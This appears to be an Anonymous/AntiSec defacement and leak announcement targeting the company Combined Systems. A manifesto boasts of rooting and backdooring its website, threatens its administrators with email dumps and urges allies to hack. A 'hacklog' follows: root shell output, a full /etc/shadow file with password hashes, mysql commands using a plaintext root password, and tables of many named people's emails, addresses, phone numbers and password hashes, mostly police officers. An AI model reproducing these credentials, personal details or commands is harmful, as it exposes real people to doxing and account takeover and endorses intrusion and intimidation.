1. __| || |__ _____ _____/ |_|__| ______ ____ ____
  2. \ __ / \__ \ / \ __\ |/ ___// __ \_/ ___\ #anonymous
  3. | || | / __ \| | \ | | |\___ \\ ___/\ \___ #antisec
  4. /_ ~~ _\ (____ /___| /__| |__/____ \ \___ \ \___ | #solidarity
  5. |_||_| \/ \/ \/ \/ \/
  6.  
  7. ################################################################################
  8.  
  9. COMBINEDSYSTEMS DEFACED AND RM'D BY ANONYMOUS ON ANNIVERSARY OF BAHRAIN UPRISING
  10.  
  11. So you war profiteering all crazy, selling mad chemical weapons to militaries
  12. and cop shops around the world, thinking you will get away unscathed by the
  13. rising tides of insurrection? Think again, assholes. Combined Systems, lay down
  14. your arms: you just lost the game. In the past we have marched on your offices
  15. in Jamestown, Pennsylvania: now it is time to march on your websites. All your
  16. "less than lethal" arms were simply no match for our 9000 cocks and mad black
  17. hat technique. We came, we saw, we rooted and rm'd your website. Umad?
  18.  
  19. From the streets of Oakland to Tahrir Square, to Palestine, Greece, Bahrain and
  20. Syria, your sinister instruments of torture and brutality have been used by the
  21. vile swine enforcers of the rich ruling classes to repress our revolutionary
  22. movements. You shot and gassed protesters, running them off public parks in the
  23. US. Several dozen died because of your tear gas used in Egypt. You wave the
  24. Israeli flag outside of your offices, while just two months ago your tear gas
  25. cannisters fired by the IDF killed a man in the West Bank. Did you think we
  26. forgot? Why did you not expect us?
  27.  
  28. In addition to dumping name, address, phone and password information for dozens
  29. of CSI employees and clients, our tag team of mayhem went the extra mile by
  30. dumping email for some of the pigs ordering anti-protester gear off their shitty
  31. website. We also hit sur-tec.com, some shitty CCTV surveillance company owned by
  32. former FBI director Clarence M. Kelley (their password was 'government'). Do you
  33. think they will appreciate the irony of being owned due to buying "security"
  34. products from a compromised website? How long do you think we had your website
  35. backdoored, capturing all incoming customers registrations and orders? 42? If
  36. you ever get your website back up, do you think you will be anything more than a
  37. shadow of your former self? Will your clients ever trust you again?
  38.  
  39. Unfortunately, some random paypal phisher also hacked and abused the server.
  40. This noob was reported to the sysadmins by google, forcing us to move forward
  41. with our plans ahead of schedule. To the system administrators and web
  42. developers who aided and abetted CombinedSystems.com, we got something for your
  43. asses too (and it's more than getting pounded with 9000 dildos at maximum
  44. vibration speed): if you so much as lift a finger to support CSI in rebuilding
  45. their websites, we will post all your mail on you and all your clients (aka The
  46. Lolcaust). Any other brave whitehats want to step up to CSI's defense?
  47.  
  48. To our hacker allies, our fellow occupiers, our militant comrades all around the
  49. world, the time for talk is over: it's time to hack and smash, beat and shag.
  50. Each and every #FuckFBIFriday we will make war on the infrastructure of the
  51. military prison industrial non-organic complex, targeting all war profiteers,
  52. corporate executives, white hats, snitches and pigs. We're coming to loot,
  53. plunder, and make all their base belong to us.
  54.  
  55. You really think you can crush the spirit of the Arab Spring, the Occupation
  56. Movement, and Anonymous with tear gas and subpoenas?! Mothafucka, our mad skills
  57. iz bulletproof. Now let's bust out that hacklog! <3
  58.  
  59. #Anonymous' Blackbook http://mir.cr/12XRSILE
  60.  
  61.  
  62. # id
  63. uid=0(root) gid=0(root) groups=81(apache),1001(admin)
  64.  
  65. # cat /etc/shadow
  66. root:$6$XA3nEJ3u$jTdVUv6ASAzQHRoisvRFT0UC32OviCaYFN1ZnCqPbuK9FaSHrbVoJLxdO5e5maWi0OJyELTtVnRjfySD3VZI//:15323:0:::::
  67. halt:*:9797:0:::::
  68. operator:*:9797:0:::::
  69. shutdown:*:9797:0:::::
  70. sync:*:9797:0:::::
  71. bin:*:9797:0:::::
  72. daemon:*:9797:0:::::
  73. adm:*:9797:0:::::
  74. lp:*:9797:0:::::
  75. mail:*:9797:0:::::
  76. postmaster:*:9797:0:::::
  77. news:*:9797:0:::::
  78. uucp:*:9797:0:::::
  79. games:*:9797:0:::::
  80. guest:*:9797:0:::::
  81. nobody:*:9797:0:::::
  82. sshd:!:13623:0:99999:7:::
  83. mysql:!:13946:0:99999:7:::
  84. apache:!:13946:0:99999:7:::
  85. ftp:!:13946:0:99999:7:::
  86. proftpd:!:13946:0:99999:7:::
  87. ntp:!:13946:0:99999:7:::
  88. admin:$1$HgFsFVPN$aV1rEssvruvulGi0icuTZ/:13946:0:99999:7:::
  89. cmd5checkpw:!:13987:0:99999:7:::
  90. alias:!:13987:0:99999:7:::
  91. qmaild:!:13987:0:99999:7:::
  92. qmaill:!:13987:0:99999:7:::
  93. qmailp:!:13987:0:99999:7:::
  94. qmailq:!:13987:0:99999:7:::
  95. qmailr:!:13987:0:99999:7:::
  96. qmails:!:13987:0:99999:7:::
  97. yinrunning:!:13987:0:99999:7:::
  98. cron:!:13987:0:99999:7:::
  99. vpopmail:!:13987:0:99999:7:::
  100. geeojr:$1$otVB6tcm$CB9HAOBixkDMDMBJsDPSx0:14714:0:99999:7:::
  101. ventrilo:!:14866:0:99999:7:::
  102. dizzle:$6$Z1M6S/Dl$GJoNATO8G7iMDeiJ6v4V1t5cW1IreQg80aT9rAPBwCIgl2rF94fxuibIxOX6Eh6QJhHVWQU8IpOjhSo30NWzi.:15383:0:99999:7:::
  103.  
  104. # mysql -uroot -pbigGoat -e 'show databases'
  105. +--------------------+
  106. | Database |
  107. +--------------------+
  108. | information_schema |
  109. | cambridge |
  110. | cbts |
  111. | cgsurvey |
  112. | cragar |
  113. | csi |
  114. | dio_dealers |
  115. | dirty_guild |
  116. | dmikc |
  117. | kwotez |
  118. | lldog |
  119. | mark |
  120. | mysql |
  121. | plusovella |
  122. | ppbnb |
  123. | roundcubemail |
  124. | sls |
  125. | tweld |
  126. | voltage |
  127. | vpopmail |
  128. | widespread |
  129. | yinrunning |
  130. | zip_codes |
  131. +--------------------+
  132.  
  133. # mysql -uroot -pbigGoat csi -e 'show tables'
  134. +-------------------------+
  135. | Tables_in_csi |
  136. +-------------------------+
  137. | admin_auth |
  138. | admin_auth_permissions |
  139. | admin_group_permissions |
  140. | admin_groups |
  141. | admin_permissions |
  142. | customers |
  143. | dealers |
  144. | events |
  145. | featured |
  146. | galleries |
  147. | order_details |
  148. | orders |
  149. | pages |
  150. | product_categories |
  151. | products |
  152. | quote_details |
  153. | quotes |
  154. | zipcodes |
  155. +-------------------------+
  156.  
  157. # mysql -uroot -pbigGoat csi -e 'select * from admin_auth'
  158. +--------+---------+-------------+------------------------------------+------------------+------------------------------+------------+
  159. | AuthID | GroupID | User | Crypt | Name | Email | SessionKey |
  160. +--------+---------+-------------+------------------------------------+------------------+------------------------------+------------+
  161. | 1 | 0 | becky | $1$gBKmP3yL$U6pnUUgiSKW2he5UBhVmA/ | Rebecca Adamson | becca.adamson@gmail.com | |
  162. | 18 | 0 | aprilbriggs | $1$MFK5TwyA$kkK8/FG0Uz.17HZlxoPsB. | April | aprilmaebriggs@gmail.com | |
  163. | 19 | 0 | paul | $1$N/4o6/9c$qt1nj4zH6haBNA6nbr/Pz/ | Paul Ford | paulford@combinedsystems.com | |
  164. | 20 | 0 | kristal | $1$gV2rX/IL$D14hGEolAcUkYBdkAzMyQ1 | Kristal Starcher | kristal@combinedsystems.com | |
  165. | 21 | 0 | Amber | $1$9B.J0lLD$P79Vgx5JxzwazBH64PeMD. | Amber Jones | ajones@combinedsystems.com | |
  166. | 22 | 0 | Robin | $1$wjjvGLpf$RFW0iC/kgux/Bm9bezuw7/ | Robin Urbansky | robin@combinedsystems.com | |
  167. | 23 | 1 | john | $1$Ojz4FFzU$MOMSg8dxlF0mgIIClSKwS. | John Dapkins | john@jerseytactical.com | |
  168. +--------+---------+-------------+------------------------------------+------------------+------------------------------+------------+
  169.  
  170. # mysql -uroot -pbigGoat csi -e 'select * from customers'
  171. +------------+------------------+--------------------------------------+------------------------------------+-----------+--------------+----------------------------------------+----------------------------------------------------+----------+----------+-----------------+-------+---------------------------------------------------+---------+---------+-----------------+-------------+----------+
  172. | CustomerID | PaymentGatewayID | SessionKey | Password | FirstName | LastName | Email | Address | Address2 | Address3 | City | State | Company | Zip | Country | Phone | AccountType | Approved |
  173. +------------+------------------+--------------------------------------+------------------------------------+-----------+--------------+----------------------------------------+----------------------------------------------------+----------+----------+-----------------+-------+---------------------------------------------------+---------+---------+-----------------+-------------+----------+
  174. | 100 | NULL | 57bb9154-3ed6-11e1-8560-00163e001107 | $1$Dsq2lGGU$XEcNv74KmQZyAprfKlWjj1 | Becky | Adamson | becca.adamson@gmail.com | 104 E. 5th | NULL | NULL | kansas City | MO | Paul Davies Design | 64106 | NULL | 8168384617 | Distributor | 1 |
  175. | 102 | NULL | | $1$vD9GENEZ$ghd1OfDYCNA2MI2D/x6iU. | PR | Ford | prford12@gmail.com | 388 Kinsman Road | NULL | NULL | Jamestown | PA | ABC Company | 16134 | NULL | 5122481117 | Distributor | 1 |
  176. | 105 | NULL | 3fd1084c-4b85-11e1-8560-00163e001107 | $1$X3AJN.Ti$KlkRsDux9dBSRZeJ60rJF/ | Kristal | Starcher | kristal@combinedsystems.com | 388 Kinsman Rd. | NULL | NULL | Jamestown | PA | CSI | 16134 | NULL | 724-932-2177 | Agency | 1 |
  177. | 104 | NULL | a5be641e-3c8b-11e1-8560-00163e001107 | $1$.fTDRoLb$nBkAwydu.Mycw2XZswk2// | becky | adamson | becky@fireflymkt.com | 601 Walnut | NULL | NULL | kansas city | MO | 123 | 64105 | NULL | 8168384617 | Agency | 1 |
  178. | 107 | NULL | NULL | $1$XwlU4Vw6$3lSjbd/YN8vIbm0y5pL3e1 | Paul | Ford | paulford@combinedsystems.com | 16100 Braesgate Drive | NULL | NULL | Austin | TX | DIST ABC | 78717 | NULL | 512-244-5906 | Distributor | 1 |
  179. | 143 | NULL | NULL | $1$FaV6UwhY$YtqgVimvLYIPX1W5uSR4J/ | Jeff | Frost | JFrost@pcsonet.com | 14400 49th Street | NULL | NULL | Clearwater | FL | Pinellas County Sheriff\\ | 33762 | NULL | 727-464-6415 | Agency | 1 |
  180. | 121 | NULL | NULL | $1$Za4buTCY$k7SbPieSNmvsyuOf5LpMA. | Lauren | Maddox | lmaddox@jeffcitymo.org | 401 Monroe Street | NULL | NULL | Jefferson City | MO | Jefferson City Police Department | 65101 | NULL | 573-634-6348 | Agency | 1 |
  181. | 109 | NULL | NULL | $1$Roh3RmaD$7WpU5zZQjSWgFytAoFIDi1 | Dennis | Palmer | dennispalmer@combinedsystems.com | 26951 Cedar Mesa Rd. | NULL | NULL | Cedaredge | CO | Cedar Mesa PD | 81413 | NULL | 970 856-3972 | Agency | 1 |
  182. | 110 | NULL | NULL | $1$Z3NeJ.hv$Joi85kbmqtZiko5463Gz9. | Dennis | Palmer | DennisPalmer@combinedsystems.com | 26951 Cedar Mesa Rd. | NULL | NULL | Cedaredge | CO | Cedaredge PD | 81413 | NULL | 970 856-3972 | Agency | 1 |
  183. | 112 | NULL | NULL | $1$TXQa.GeH$hgdm0ZGLIcN3Qf0OO21DE0 | Roberto | Dominguez | rdominguez@whiteplainsny.gov | 77 S. Lexington Ave. | NULL | NULL | White Plains | NY | City of White Plains Police Department | 10601 | NULL | 914-422-6111 | Agency | 1 |
  184. | 119 | NULL | 9627865e-43af-11e1-8560-00163e001107 | $1$8TLNFpzJ$70ZiAdAZoHJc3LnLIVrB3. | Scott | haymaker | shaymaker@cojtwn.com | 401 Washington St | NULL | NULL | Johnstown | PA | Johnstown Police Dept | 15901 | NULL | 814-533-2080 | Agency | 1 |
  185. | 120 | NULL | 7ae19c86-42ce-11e1-8560-00163e001107 | $1$pG8bTL0k$W3f2jmm2aKcbpV5Jv1poO1 | David | Martin | dmartin@edennc.us | 308-B E. Stadium Dr | NULL | NULL | Eden | NC | Eden Police Department | 27288 | NULL | (336) 623-9755 | Agency | 1 |
  186. | 122 | NULL | NULL | $1$enIkEDU5$.Vf7npITBbj9Gpye/9OQz1 | Gene | Petrino | epetrino@psd.plantation.org | 451 NW 70th Ter | NULL | NULL | Plantation | FL | Plantation Police Department | 33317 | NULL | 954-797-2100 | Agency | 1 |
  187. | 116 | NULL | 377e99d0-45d0-11e1-8560-00163e001107 | $1$tHJLMsFW$2e8aY//On9OrG0D8eKA4s. | Chris | McDonald | mcdonaldcr@state.gov | 4000 N Adrews Ave | NULL | NULL | Ft. Lauderdale | FL | US Department of State | 33309 | NULL | 954-630-1165 | Agency | 1 |
  188. | 117 | NULL | | $1$Eqe5/tAJ$ABKUrVSSeLfEmZo8vBV.Y1 | Steve | Hooper | Steve.Hooper@odrc.state.oh.us | 11781 State Rt 762 | NULL | NULL | Orient | OH | Ohio Dept. of Rehabilitation and Corrections | 43146 | NULL | 614-915-7910 | Agency | 1 |
  189. | 126 | NULL | NULL | $1$8v1XmbP7$573TUTFpUcj1pvHBDwZx91 | Jody | Wheet | jrw@village.herkimer.ny.us | 120 Green St | NULL | NULL | Herkimer | NY | Herkimer Police Department | 13350 | NULL | 315-866-4330 | Agency | 1 |
  190. | 127 | NULL | NULL | $1$2ybsup7K$BAYhzdZt/u4IAh3ZC.ujw0 | ringgold | delahoussaye | ringgold.delahoussaye@sheriff.hctx.net | 1200 Baker St. | NULL | NULL | Houston | TX | Harris County Sheriffs Office | 77002 | NULL | 713-755-8800 | Agency | 1 |
  191. | 138 | NULL | NULL | $1$D265UKqE$mfubHye9NVrMXB1WUKJ7V0 | Keith | Chesnut | keith_chesnut@isp.state.il.us | 4700 Rogers St | NULL | NULL | Springfield | IL | Illinois State Police, SOCOM | 62703 | NULL | 815-509-6875 | Agency | 1 |
  192. | 124 | NULL | NULL | $1$Hn8QCiP8$Ks2iEKkSUUm1YF4Re5twg/ | Matthew | Hood | mlhood@cityofchesapeake.net | 304 Albemarle Dr | NULL | NULL | Chesapeake | VA | Chesapeake Police Dept SWAT | 23322 | NULL | 757-560-3172 | Agency | 1 |
  193. | 125 | NULL | NULL | $1$NzL7bndk$WHIPnvQZS8lEMJRzE3Kam1 | Angelo | Vourakis | angelo.vourakis@totaldefenseperu.com | Calle Los Topacios 390 # 302 Urb. Cerros de Camach | NULL | NULL | Lima | Other | Total Defense S.A.C | Lima18 | NULL | 011511945957175 | Distributor | 0 |
  194. | 128 | NULL | NULL | $1$u15l6s4d$O/SeaO8wtPE19DeKqXT830 | Jeremy | House | jhouse@rogers.com | 474 Elgin St | NULL | NULL | Ottawa | Other | Ottawa Police Tactical Unit | K2S 2E2 | NULL | 613-808-7459 | Agency | 0 |
  195. | 129 | NULL | 637efbf2-4840-11e1-8560-00163e001107 | $1$liO1rgwD$EcyFSeE174L.DV/aS1Owr1 | Brett | Milo | brettmilo@sbcglobal.net | 4N468 School Rd | NULL | NULL | St. Charles | IL | The Milo Group | 60175 | NULL | 6302157894 | Distributor | 1 |
  196. | 130 | NULL | 7014564e-4856-11e1-8560-00163e001107 | $1$EvVqGVfP$K6MMi6xWCc390Ojxgcw5Z0 | Donald | Tuuri | tuurid@ci.kentwood.mi.us | 4742 Walma AVE SE | NULL | NULL | Kentwood | MI | Kentwood PD | 49512 | NULL | 61666986580 | Agency | 1 |
  197. | 131 | NULL | f0230972-4859-11e1-8560-00163e001107 | $1$.GqyG/5C$OzcJsAuQFDDScuedculk51 | John | Castrodale | pdchief.empiregov@skybeam.com | 30 E. Park Ave | NULL | NULL | Empire | CO | Empire Police Department | 80438 | NULL | 303-569-2281 | Agency | 1 |
  198. | 132 | NULL | NULL | $1$cnSlxefW$LXQtThuQ8sAubRArQUkXF1 | Johnnie | Jones III | jjones37@twu.edu | 301 Administration Drive | NULL | NULL | Denton | TX | Texas Woman\'s University | 76204 | NULL | 8066264293 | Agency | 0 |
  199. | 133 | NULL | NULL | $1$rwoNKWeO$QzhWqBeqshEl7FwwCY9xl. | Doug | Vance | dvance@vancesle.com | 3723 Cleveland Ave | NULL | NULL | Columbus | OH | Vance Outdoors, Inc. | 43224 | NULL | 614-471-7000 ex | Distributor | 1 |
  200. | 137 | NULL | NULL | $1$DIOQwVDQ$EJWok0Ex2R9rCa0Ij5UBI0 | Michael | OHerron | omichael22@aol.com | 3549 N. Vermilion St | NULL | NULL | Danville | IL | Ray OHerron Co, Inc | 61832 | NULL | 800-223-2097 | Distributor | 1 |
  201. | 135 | NULL | cee58b4e-4b6b-11e1-8560-00163e001107 | $1$95lnzKAJ$evjsaYq.05FbNWnGqon710 | robert | salter | rsalter@cityofnewport.com | 120 broadway | NULL | NULL | newport | RI | newport police department | 2840 | NULL | 401-845-5865 | Agency | 1 |
  202. | 136 | NULL | 8df67c88-4940-11e1-8560-00163e001107 | $1$f/Ynr7/X$iFV2mTPtWL9yMgMDSkzAC. | Bob | Rosipal | brosipal@cascadecountymt.gov | 3800 Ulm N. Frontage Road | NULL | NULL | Great Falls | MT | Cascade County Sheriff\\ | 59404 | NULL | (406)-454-6820 | Agency | 1 |
  203. | 139 | NULL | NULL | $1$t1P8Pa5O$kKFZdpLX7xEwlUOaVdvnv/ | Kyle | Montgomery | kmontgomery@cityofmagnolia.com | 18111 Buddy Riley | NULL | NULL | Magnolia | TX | Magnolia Police Dept. | 77354 | NULL | 281-356-2500 | Agency | 1 |
  204. | 140 | NULL | 7da039ba-4d04-11e1-acab-00163e001107 | $1$5ZvIxXne$SY7kS4vUFh8vgrNxzUB4b/ | Mark | Silbernagel | mmsilbernage@wisc.edu | 1429 Monroe Street | NULL | NULL | Madison | WI | University of Wisconsin-Madison Police Department | 53711 | NULL | 6085160563 | Agency | 1 |
  205. | 141 | NULL | NULL | $1$/HyEDnY9$lEEkVO/CZl1F.uV0bt7jY. | Travis | Norton | tnorton@ci.oceanside.ca.us | 3855 Mission Ave. | NULL | NULL | Oceanside | CA | Oceanside Police Department | 92054 | NULL | 760-435-4862 | Agency | 1 |
  206. | 142 | NULL | NULL | $1$SWS6wYK6$z.VByyS4q3gtGIqZb.AcT. | Pete | Fogarty | pfogarty@kckpd | 7340 State | NULL | NULL | Kansas City | KS | KCKPD | 66104 | NULL | 9135962056 | Agency | 1 |
  207. | 145 | NULL | NULL | $1$g/TgUup0$K5qHjGpF9rqD4/eF1Zo7I0 | Todd | Droll | tad21@arl.psu.edu | PO Box 30 | NULL | NULL | State College | PA | Applied Research Laboratory | 16804 | NULL | 814-865-3087 | Agency | 1 |
  208. | 146 | NULL | NULL | $1$tMYUqKTs$mYy1.vUhvF.NrMbICQCKy. | Gary | Bolen | gbolen@columbusga.org | 510 Tenth Street | NULL | NULL | Columbus | GA | Columbus Police De[artment | 31902 | NULL | 706.225.4122 | Agency | 1 |
  209. | 147 | NULL | NULL | $1$g/LE9k4L$sq926rPg8vQ9KvGg9tqW0. | Paul | Poumaka | ppoumaka@barrick.com | PO Box 484 Mt Hagen | NULL | NULL | Porgera | Other | Porgera PNG | 3456 | NULL | +675 5443456 | Agency | 0 |
  210. | 148 | NULL | NULL | $1$b7/jnDJg$U7IC/m5lMMuUBTtVsFKFG0 | Frank | Moody | fmoody@providenceri.com | 325 Washington St | NULL | NULL | Providence | RI | Providence Police | 2903 | NULL | 401-243-6134 | Agency | 1 |
  211. | 149 | NULL | 022ff858-4dc5-11e1-acab-00163e001107 | $1$Y0o4i828$vA5Y8z4sZSxNYBN0U3xSH/ | david | kimak | dkimak@livingstonnj.org | 333 s livingston ave | NULL | NULL | livingston | NJ | livingston police dept | 7039 | NULL | 973-992-3000x32 | Agency | 1 |
  212. | 151 | NULL | b109bde6-4d0c-11e1-acab-00163e001107 | $1$tpKbEJzx$4xy8qS.feoMokfAedkcGh0 | Charles | Libby | charlesl@portlandmaine.gov | 109 Middle St | NULL | NULL | Portland | ME | Portland PD | 4101 | NULL | 207 874 8530 | Agency | 1 |
  213. | 163 | NULL | NULL | $1$7VHa6w4I$.e90VfNacxCxQ/P.hXKpb/ | Brian | Roussell | broussell@rochestermn.gov | 101 4th St SE | NULL | NULL | Rochester | MN | Rochester Police Department | 55901 | NULL | 5072080093 | Agency | 1 |
  214. | 162 | NULL | d971e7d8-4cf6-11e1-acab-00163e001107 | $1$hNuOugwx$4MuJzqZVH1PIuZ97ZKjw/0 | Dan | Sandberg | sandberg_do@co.brown.wi.us | 2684 Development Drive | NULL | NULL | Green Bay | WI | Brown County Sheriff\\ | 54311 | NULL | 920-448-4271 | Agency | 1 |
  215. | 155 | NULL | NULL | $1$pHVhobO5$ZBOFy69KUmGVJnl1riyDu. | Sedrick | Aiken | aikens@bbfl.us | 100 East Boynton Beach Blvd. | NULL | NULL | Boynton Beach | FL | Boynton Beach Police Department | 33435 | NULL | 561-742-6181 | Agency | 1 |
  216. | 156 | NULL | NULL | $1$oDHSK.HU$zx0JvkSXwvFZcaGmsFfq// | Noel | Thorburn | akar@paradise.net.nz | 299b Clarks Beach Rd RD4 Pukekohe | NULL | NULL | Auckland | Other | Akar (NZ) Law Enforcement & Tactical Supplies Ltd | 2679 | NULL | 0064 9 2321489 | Distributor | 0 |
  217. | 184 | NULL | NULL | $1$7FsLOYYa$XPsxu768/dPrrDsU.ryNI0 | Gary | Seymour | gseymour@eriecountygov.org | 1618 Ash Street | NULL | NULL | Erie | PA | Erie County Prison | 16503 | NULL | 814-451-7572 | Agency | 0 |
  218. | 165 | NULL | NULL | $1$n2AVDZVo$Iv0L/XOQPTDi5O/utZzIF0 | Angelo | Gabriele | agabriele@jibc.ca | 715 McBride Blvd. | NULL | NULL | New Westminster | Other | BC Corrections | V3L 5T4 | NULL | 604-528-5840 | Agency | 0 |
  219. | 166 | NULL | | $1$cjug.1iq$nDgiMkcOABTEw..GuIO9Q. | Randal | Hodges | rhodges@bakerso.com | 1 Sheriffs office drive | NULL | NULL | Macclenny | FL | Baker County Sheriffs Office | 32063 | NULL | 904-562-9087 | Agency | 1 |
  220. | 167 | NULL | NULL | $1$aJ5Awv1q$Q.5LnL6tfL1.zmgvEUtBM/ | Greg | McComb | sales@maximumammunition.com | 803 North Gordon Street | NULL | NULL | Marshall | MI | Maximum Ammunition LLC | 49068 | NULL | 269-719-0643 | Agency | 0 |
  221. | 168 | NULL | NULL | $1$UjaqrttV$Lo3lSZBo0BUkE1lGMsNsm1 | Stanley | Schaeffer | stanley.schaeffer@manateesheriff.com | 600 US HWY 301 Blvd West Suite 202 | NULL | NULL | Bradenton | FL | manatee county sheriff\\ | 34205 | NULL | 941-747-3011 ex | Agency | 1 |
  222. | 169 | NULL | NULL | $1$h1OoHGck$98ZQgaTX9Ig3Avz9bSzrr1 | john | kuhlen | johnnykuhlen@yahoo.com | 1233 west main street | NULL | NULL | millville | NJ | NJ DOC | 08332 | NULL | 8567651125 | Agency | 0 |
  223. | 170 | NULL | 9816e5de-533d-11e1-a19d-00163e001107 | $1$4qlfclxA$9pHN5O/ylu7NlSK.6uSv/. | Jason | McAmbley | jason.mcambley@bangormaine.gov | 240 Main Street | NULL | NULL | Bangor | ME | Bangor Police Department | 4401 | NULL | 207-947-7384 | Agency | 1 |
  224. | 171 | NULL | NULL | $1$.E7Ejjdm$ZxVNIRBrOGWpK6C.8OBo31 | Charles | Poole | fourpooles@gmail.com | 155 E. Main St. | NULL | NULL | Newark | OH | Licking County Sheriffs Office | 43055 | NULL | 740-281-6006 | Agency | 0 |
  225. | 172 | NULL | 582f46fc-5462-11e1-a19d-00163e001107 | $1$CNrF1iuW$QwtMvxt5P.UnP3AR8mjyV1 | Richard | Horrell | rshorrel@gocolumbiamo.com | 600 E Walnut | NULL | NULL | Columbia | MO | Columbia Police Department | 65201 | NULL | 5738747652 | Agency | 1 |
  226. | 173 | NULL | 5a952064-5350-11e1-a19d-00163e001107 | $1$gPcOkXzg$AEzCuaqMW6z2D1JfxkOjK0 | Sgt. Dawn | Shafer-D\\ | dshafer@co.broome.ny.us | 155 Lt Vanwinkle Dr | NULL | NULL | Binghamton | NY | Broome County Sheriff\\ | 13905 | NULL | 607.778.6006 | Agency | 1 |
  227. | 174 | NULL | NULL | $1$pyL3hGz/$60KA.3ButfCpk475ra8ke/ | Chuck | DeGroff | cdegroff@jacksongov.org | 28900 E. Argo Road | NULL | NULL | Grain Valley | MO | Jackson County Sheriff\\ | 64029 | NULL | 816-220-3274 | Agency | 1 |
  228. | 175 | NULL | NULL | $1$2MU6O/3M$HYIkmQNrwDBxIMxjpFnbT/ | wade | humphries | wwadeh@hotmail.com | 1701 indigo island dr | NULL | NULL | hanahan | SC | north charleston police | 29410 | NULL | 843 224 7922 | Agency | 0 |
  229. | 176 | NULL | | $1$wrPXyqm6$SFA8ETEuygQG86i124ZCn. | Artie | Roper | aroper@doc.nv.gov | 5312 Coral Hills Street | NULL | NULL | North Las Vegas | NV | Nevada Department of Corrections | 89081 | NULL | 702-562-5003 | Agency | 1 |
  230. | 177 | NULL | | $1$XwNsxlLN$obUV1lu2PCN0x50clhO5w/ | Charlie | Beswick | cbeswick@nbpd.org | 870 Santa Barbara Dr. | NULL | NULL | Newport Beach | CA | Newport Beach Police Dept. | 92660 | NULL | 949-644-3678 | Agency | 1 |
  231. | 178 | NULL | 3261c480-53cd-11e1-a19d-00163e001107 | $1$og.rY6ny$CvwZ2umCv74/BXwdn8euE/ | Jim | Harrell | jim.harrell@mansfield-tx.gov | 1601 Heritage Pkwy. | NULL | NULL | Mansfield | TX | Mansfield Police Department | 76063 | NULL | 8178045709 | Agency | 1 |
  232. | 183 | NULL | 2c0521e4-56c1-11e1-a19d-00163e001107 | $1$IWmQgR9N$ZYhKre0WpWr12.aZmuFP61 | Charles | Bogle | chuck.bogle@rcstn.net | 802 Willow street | NULL | NULL | Springfield | TN | Springfield | 37172 | NULL | 615-767-0270 | Agency | 1 |
  233. | 180 | NULL | NULL | $1$67sKmjxo$n.mMglnuFjqPK/DPQ7QJr1 | Dale | Dear | dale.dear@colliersheriff.com | 3319 Tamiami Trl E | NULL | NULL | Naples | FL | Collier County Sheriff\\ | 34112 | NULL | 239-285-8299 | Agency | 1 |
  234. | 181 | NULL | NULL | $1$QJ/LpGX8$IqiVeoChJyp2BqGz9pYbc/ | Scott | Hagemeister | shagemeister@rileycountypolice.org | 1001 S. Seth Child Rd. | NULL | NULL | Manhattan | KS | Riley County Police Dept. | 66502 | NULL | 785-537-2112 ex | Agency | 1 |
  235. | 182 | NULL | 1140271c-533f-11e1-a19d-00163e001107 | $1$f3ngPYKz$NOX6lAcoxx4Oh0Tya1Uc8/ | Robert | McElroy | rmcelroy@acgov.org | 6289 Madigan Road | NULL | NULL | Dublin | CA | Alameda County Sheriff\\ | 94568 | NULL | 925-803-7133 | Agency | 1 |
  236. | 191 | NULL | NULL | $1$aWwRzfii$LhDQ7zotCbif7iRt0gNdh0 | hassio | mat | aloo2200@hotmail.com | 366 | NULL | NULL | mam | Other | ara | 973 | NULL | 39430542 | Agency | 0 |
  237. | 185 | NULL | 73234c0c-5650-11e1-a19d-00163e001107 | $1$WiGrW5.U$B.eI2RY1TjOqMghum2BQB0 | Wesley | Green | wgreen@ci.collierville.tn.us | 156 N. Rowlett St. | NULL | NULL | Collierville | TN | Collierville Police Dept | 38017 | NULL | (901) 457-2500 | Agency | 1 |
  238. | 186 | NULL | NULL | $1$cMMpUxdk$xgM7zDPGB8hFN6nd.fs/b0 | Steve | Morrisey | pd149@pottstown.org | 100 E. High St. | NULL | NULL | Pottstown | PA | Pottstown PD | 19464 | NULL | 484-942-3801 | Agency | 0 |
  239. | 187 | NULL | NULL | $1$QX/b7QpH$RTgw781brGd8bUTPqZNAI. | Rick | Washburn | richard.washburn@co.benton.wa.us | 7122 W Okanogan Pl | NULL | NULL | Kennewick | WA | Benton County Sheriffs Office | 99337 | NULL | 509-735-6555x38 | Agency | 0 |
  240. | 188 | NULL | 61a62134-5420-11e1-a19d-00163e001107 | $1$FqM7vaTy$ix8pf/JJXU7tUgWa6cXKU0 | Cory | Hunt | chunt@allegancounty.org | 112 Walnut Street | NULL | NULL | Allegan | MI | Allegan County Sheriff\\ | 49010 | NULL | 269-673-0500 x4 | Agency | 1 |
  241. | 189 | NULL | NULL | $1$sjozgMAc$R1qY9YXtCvaT3BfJDwsOu0 | John | Feith | jfeith@police.warracres-ok.gov | 4801 North Reeves | NULL | NULL | Warr Acres | OK | Warr Acres Police Department | 73122 | NULL | 405-789-3329 | Agency | 0 |
  242. | 190 | NULL | NULL | $1$nG62aACi$MBPClSU9qE9CEaeBidnTi/ | Dave | Wilcox | dwilcox@tssi-ops.com | Box 641 | NULL | NULL | Warrenton | VA | TSSI | 20188 | NULL | 540 347 2252 | Distributor | 0 |
  243. | 192 | NULL | NULL | $1$M86TwvY4$chYHZ7ArRcHDX.5Qzx8721 | James | Minninger | jminntbpd@comcast.net | 100 Penn Avenue | NULL | NULL | Telford | PA | Telford Borough Police Dept | 18969 | NULL | 215-723-6700 | Agency | 0 |
  244. +------------+------------------+--------------------------------------+------------------------------------+-----------+--------------+----------------------------------------+----------------------------------------------------+----------+----------+-----------------+-------+---------------------------------------------------+---------+---------+-----------------+-------------+----------+
  245.  
  246. # mysql -uroot -pbigGoat csi -e 'select * from dealers'
  247. +-----------------------------------+-----------------+----------+-----+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------------------------+------------------------+-------+-----------------------------------------------------------------------------------------------------+-----------------------+----------+-------------+----------+------------------+
  248. | address | city | dealerID | fax | mapLink | name | phone | state | URL | zip | password | accountType | approved | description |
  249. +-----------------------------------+-----------------+----------+-----+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------------------------+------------------------+-------+-----------------------------------------------------------------------------------------------------+-----------------------+----------+-------------+----------+------------------+
  250. | 116 E. Ellison | Burleson | 345 | | http://maps.google.com/maps?q=116+e+ellison+burleson+tx+76028&hl=en&hnear=116+E+Ellison+St,+Burleson,+Texas+76028&t=m&z=16&vpsrc=0 | Texas Gun Works | (817) 447-7180 | TX | | 76028 | | Distributor | 1 | |
